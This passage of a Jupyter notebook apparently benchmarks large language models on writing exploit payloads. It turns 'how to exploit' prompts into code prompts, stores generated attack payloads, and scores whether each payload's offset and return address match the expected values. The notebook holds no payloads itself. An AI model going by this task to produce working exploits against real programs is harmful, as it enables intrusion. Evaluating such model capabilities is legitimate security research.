      exec_time.append(inference_time)
      code = parse_output(response)
      print(code)
      llama70_responses.append(code)
      response=None
import json
with open('llama_70_responses.json','w') as f:
  json.dump({
      'files': list(files),
      'responses':llama70_responses,
  },f)

In [None]:
cleaned_resp = []
for resp in llama70_responses:
  if '\n' in resp:
    resp = resp.split('\n')[0]
  cleaned_resp.append(resp)

len(cleaned_resp)

In [None]:
code_data = []
program_details = []
for file in list(valid_files):
  filename_1 = f'{file}1.txt'
  filename_3 = f'{file}3.txt'
  print(f"Parsing {file}\n")

  with open(f'./phase_outputs/model_a/{filename_1}','r') as f:
    file_prompt = f.read()
    if 'program' in file_prompt:
      model_b_prev = file_prompt.replace('Explain to me how to exploit the following program:',"Given the code:") 
      code_data.append(model_b_prev)

    else:
      model_b_prev = file_prompt.replace('Explain to me how to exploit the following:',"Given the code:") 
      code_data.append(model_b_prev)

  with open(f'./phase_outputs/model_a/{filename_3}','r') as f:
    model_a_prompt = f.read()
    program_details.append(model_a_prompt)

In [None]:
import statistics
statistics.mean(exec_time)

In [None]:
!pip -q install pandas
import pandas as pd
df = pd.DataFrame({'code': code_data, 'program_details': program_details, 'attack_payload_gen': cleaned_resp,'base_filename':list(valid_files),'time':exec_time})
df

In [None]:
is_valid = []
for row in df.itertuples(index=True, name="Row"):
    print(f"Index: {row.Index}, filename: {row.base_filename}")
    offset,address = extract_info(row.program_details)
    off_gen,addres_gen = extract_offset_and_address(row.attack_payload_gen)
    if off_gen==offset and addres_gen==address:
      is_valid.append(True)
    else:
      # print("NOT Pass")
      # print(f"\tOffset: {offset} vs {off_gen}")
      # print(f"\tAddress: {address} vs {addres_gen}")
      # print(f"\tAttack Payload: {row.attack_payload_gen}")
      # print(f"\n\tprogram_details: {row.program_details}")
      # print('\n\n')
      is_valid.append(False)

In [None]:
df = df.assign(is_valid=is_valid)
df

In [None]:
count = df['is_valid'].value_counts().get(True, 0)
print(f"Valid elements {count}/{df.shape[0]}"+": "+str(round(count/df.shape[0]*100,2))+"%")

In [None]:
df.to_json("llama70bdistildeepseek-responses.json", orient="records", indent=4)  # Pretty-printed JSON


In [None]:
pipe_model_2 = pipeline(
    task="text-generation",
    model=model,
    tokenizer=tokenizer,
    max_new_tokens=100000,
    return_full_text=False, # If set to False only added text is returned, otherwise the full text is returned. Cannot be specified at the same time as return_text.
)